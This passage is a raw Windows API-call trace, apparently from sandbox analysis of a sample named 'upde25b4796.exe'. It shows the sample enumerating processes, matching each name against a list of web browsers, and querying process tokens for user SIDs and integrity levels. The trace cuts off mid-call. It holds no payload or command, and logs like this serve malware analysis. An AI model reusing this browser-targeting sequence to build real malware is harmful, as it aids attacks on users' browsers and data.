[0325.445] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.445] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.445] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0325.446] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.446] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.446] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0325.446] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0325.446] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0325.446] GetLastError () returned 0x7a [0325.446] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0325.446] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0325.446] CloseHandle (hObject=0x66c) returned 1 [0325.447] CloseHandle (hObject=0x5b0) returned 1 [0325.447] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0325.447] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247cd0, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08G") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.447] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0325.447] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0325.447] GetLastError () returned 0x7a [0325.447] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0325.447] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0325.447] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0325.448] CloseHandle (hObject=0x66c) returned 1 [0325.448] CloseHandle (hObject=0x5b0) returned 1 [0325.448] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0325.448] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0325.449] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0325.449] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0325.449] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0325.449] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0325.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0325.449] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0325.449] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0325.449] GetLastError () returned 0x7a [0325.449] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0325.449] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0325.449] CloseHandle (hObject=0x66c) returned 1 [0325.450] CloseHandle (hObject=0x5b0) returned 1 [0325.450] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0325.450] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247e68, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08H") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.450] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0325.450] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0325.450] GetLastError () returned 0x7a [0325.450] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0325.451] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0325.451] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0325.451] CloseHandle (hObject=0x66c) returned 1 [0325.451] CloseHandle (hObject=0x5b0) returned 1 [0325.451] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0325.451] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0325.452] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0325.452] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0325.452] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0325.452] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0325.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0325.452] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0325.452] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0325.452] GetLastError () returned 0x7a [0325.452] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0325.452] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0325.452] CloseHandle (hObject=0x66c) returned 1 [0325.453] CloseHandle (hObject=0x5b0) returned 1 [0325.453] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0325.453] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x248650, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08I") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.453] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0325.453] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0325.453] GetLastError () returned 0x7a [0325.453] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0325.453] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0325.453] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0325.453] CloseHandle (hObject=0x66c) returned 1 [0325.453] CloseHandle (hObject=0x5b0) returned 1 [0325.453] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0325.454] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0325.454] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0325.454] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0325.454] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0325.454] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0325.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0325.454] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0325.455] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0327.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x275fc94 | out: SystemInformation=0x0, ResultLength=0x275fc94*=0xaf50) returned 0xc0000004 [0327.467] VirtualAlloc (lpAddress=0x0, dwSize=0xbf50, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0327.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x240000, Length=0xbf50, ResultLength=0x0 | out: SystemInformation=0x240000, ResultLength=0x0) returned 0x0 [0327.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0327.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0327.468] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0327.468] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0327.468] GetLastError () returned 0x7a [0327.468] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0327.468] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0327.468] CloseHandle (hObject=0x66c) returned 1 [0327.468] CloseHandle (hObject=0x5b0) returned 1 [0327.468] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0327.468] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x248760, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08J") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.468] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0327.468] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0327.468] GetLastError () returned 0x7a [0327.468] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0327.468] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0327.468] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0327.468] CloseHandle (hObject=0x66c) returned 1 [0327.469] CloseHandle (hObject=0x5b0) returned 1 [0327.469] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0327.469] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0327.469] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0327.469] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0327.469] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0327.469] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0327.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0327.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0327.469] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0327.469] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0327.469] GetLastError () returned 0x7a [0327.469] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0327.469] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0327.469] CloseHandle (hObject=0x66c) returned 1 [0327.469] CloseHandle (hObject=0x5b0) returned 1 [0327.469] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0327.469] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x246920, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08K") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.469] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0327.469] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0327.469] GetLastError () returned 0x7a [0327.469] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0327.469] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0327.469] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0327.469] CloseHandle (hObject=0x66c) returned 1 [0327.469] CloseHandle (hObject=0x5b0) returned 1 [0327.469] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0327.469] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0327.469] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0327.469] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0327.469] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0327.469] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0327.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0327.469] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0327.469] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0327.469] GetLastError () returned 0x7a [0327.469] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0327.469] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0327.470] CloseHandle (hObject=0x66c) returned 1 [0327.470] CloseHandle (hObject=0x5b0) returned 1 [0327.470] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0327.470] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247020, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08L") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.470] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0327.470] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0327.470] GetLastError () returned 0x7a [0327.470] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0327.470] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0327.470] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0327.470] CloseHandle (hObject=0x66c) returned 1 [0327.470] CloseHandle (hObject=0x5b0) returned 1 [0327.470] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0327.470] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0327.470] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0327.470] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0327.470] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0327.470] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0327.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0327.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0327.470] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0327.470] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0327.470] GetLastError () returned 0x7a [0327.470] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0327.470] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0327.470] CloseHandle (hObject=0x66c) returned 1 [0327.470] CloseHandle (hObject=0x5b0) returned 1 [0327.470] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0327.470] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247928, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08M") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.470] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, 